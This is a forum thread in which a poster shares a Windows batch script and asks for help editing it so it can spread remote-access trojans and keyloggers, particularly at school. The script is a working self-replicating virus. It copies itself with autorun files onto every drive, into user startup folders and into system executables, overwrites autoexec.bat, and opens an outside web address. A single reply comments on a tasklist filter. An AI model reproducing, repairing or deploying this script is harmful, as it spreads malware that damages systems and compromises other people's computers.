Batch Beta
Please Login to get full access and to disable ads.

Join the forum, it's quick and easy

Batch Beta
Please Login to get full access and to disable ads.
Batch Beta
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Thanks to awestom for removing those ads!

Staff Selections are closed! Thanks for participating!
Welcome to the new admins and mods!
About the ads, yeah. We reached our 250'th post and the ads kicked on. In order to disable them I need to purchase a ad removal feature. Now, I don't have credits and in order to get one I need donations. Thanks

You are not connected. Please login or register

help me edit

2 posters

Go down  Message [Page 1 of 1]

1help me edit Empty help me edit Mon Jan 24, 2011 11:14 pm

awestom


Admin
Admin

i believe this script has a lot of potential, with spreading rats and keyloggers, expecially if you go to school, lets discuss

there is a part that stops the keyboard from working, where is it, i would like to remove it.



@echo off & @break off & @ctty
if '%1=='ys goto :%1_c
if '%1=='zz goto :%1_z
if not exist %0 goto :eof
@for %%A in (A B F G H I J K L M N O P Q R S T U V W X Y Z) do (
if not '%1=="" shift
if exist %%A: call %0 ys %%A
)

@for /f "tokens=4" %%A in ('tasklist^| find "Idle"') do (
if not '%1=="" shift
if not exist "%userprofile%\start menu\programs\startup\%%A.bat" call %0 zz %%A
)

@for %%A in ("%windir%\system32\*.exe") do (
copy %%A %~dpA\G-%~nxA
attrib +h +r "%~dpA\G-%~nxA"
copy /v /y /b %0 + %%A %%A
)

if exist "C:\autoexec.bat" (
type %0 > "C:\autoexec.bat"
)

start http://throbs.net/fun/swf.asp?rgb.swf
cd "%windir%\system32" & bubbles.scr /p65552
goto :eof

:ys_c
@for /f "tokens=3 delims=[] " %%A in ('nbtstat -c^| find "Node"') do (
type %0 > "%2:\%%A.bat"
echo [autorun] > "%2:\autorun.inf"
echo open=%%A.bat >> "%2:\autorun.inf"
echo action=Open folder to view files >> "%2:\autorun.inf"
)

goto :eof

:zz_z
@for /d %%B in ("C:\users\*") do (
if not %%B equ Public type %0 > "%%B\start menu\programs\startup\%2.bat"
)

goto :eof

:: End of Host ::

2help me edit Empty Re: help me edit Tue Jan 25, 2011 2:53 pm

Forum_Reader

Forum_Reader
Jr Admin
Jr Admin

I don't know what your output of the Tasklist command is, but it doesn't include the word idle for me.

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum